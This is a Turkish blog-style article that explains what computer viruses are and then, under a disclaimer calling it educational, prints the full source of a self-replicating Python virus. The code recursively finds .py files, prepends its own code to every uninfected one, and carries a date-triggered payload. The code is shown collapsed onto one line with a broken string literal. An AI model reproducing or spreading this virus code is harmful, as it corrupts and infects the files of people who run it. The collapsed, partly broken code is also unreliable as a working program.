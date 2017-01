Virüsler dijital dünyanın korkulu rüyası. Peki virüs dediğimiz şey tam olarak nedir? Bir virüs nasıl yapılır? Bu sorulara bir göz attık.

Bilgisayar virüsü kötü niyetli bir programdır (malware). Çalıştırıldığında kendini yeniden üretir veya diğer programlara kopyalayar. İşletim sistemi açıldıktan sonra kullandığımız programlar kadar, veri dosyaları veya bilgisayar başlatılırken çalışan programlara da bulaşabilir.

“Virüs” terimi genelde yanlış kullanılır. Bu aslında; solucan, truva atı, BHO, spyware, rootkit malwareleri gibi bir tür malware'dir. Ancak genellikle son kullanıcı malware’lere virüs der. Virüsler aslında, zararlı aktiviteler yapan kötü niyetli yazılımlardır. Örneğin; hard diskleri kilitlemek, işlemcilerin çalışmasında bozukluklar meydana getirmek, kredi kartı numaralarını çalmak, e-mail listelerini çalarak bağlantıdakilere farklı mesajlar göndermek gibi. Virüs yazanlar, sosyal mühendislik denilen kandırma yöntemleriyle kullanıcıların zayıf yanlarını yakalar ve bilgisayarlarına girebilir. Birçok virüs, özellikle Windows sistemini hedef alır ve çoğu kez siyasi mesaj, kişisel eğlence gibi nedenlerle atak yaparlar.

Eğer siz de siber dünyanın bu tarafını tanımak istiyorsanız ve kötü niyetli hackerlara karşı güvenlik alanında birşeyler öğrenmek istiyorsanız, aşağıda basit bir virüsün kodları yer alıyor.

Uyarıyoruz; siber dünya düşündüğünüzden daha tehlikeli. Burada yazdıklarımız güvenlik uzmanı olmak isteyen kişiler için yalnızca eğitim amacı güdüyor. Verilen kodları yalnızca size ait bir sistemde çalıştırınız.

<code>#!/usr/bin/python import os import datetime SIGNATURE = "SIMPLE PYTHON VIRUS" def search(path): filestoinfect = [] filelist = os.listdir(path) for fname in filelist: if os.path.isdir(path+"/"+fname): filestoinfect.extend(search(path+"/"+fname)) elif fname[-3:] == ".py": infected = False for line in open(path+"/"+fname): if SIGNATURE in line: infected = True break if infected == False: filestoinfect.append(path+"/"+fname) return filestoinfect def infect(filestoinfect): virus = open(os.path.abspath(__file__)) virusstring = "" for i,line in enumerate(virus): if i>=0 and i <39: virusstring += line virus.close for fname in filestoinfect: f = open(fname) temp = f.read() f.close() f = open(fname,"w") f.write(virusstring + temp) f.close() def bomb(): if datetime.datetime.now().month == 1 and datetime.datetime.now().day == 25: print "HAHA YOU ARE AFFECTED BY VIRUS!! AND THAT"S AN EVIL ALUGH BY THE WAY!!" filestoinfect = search(os.path.abspath("")) infect(filestoinfect) bomb()</code>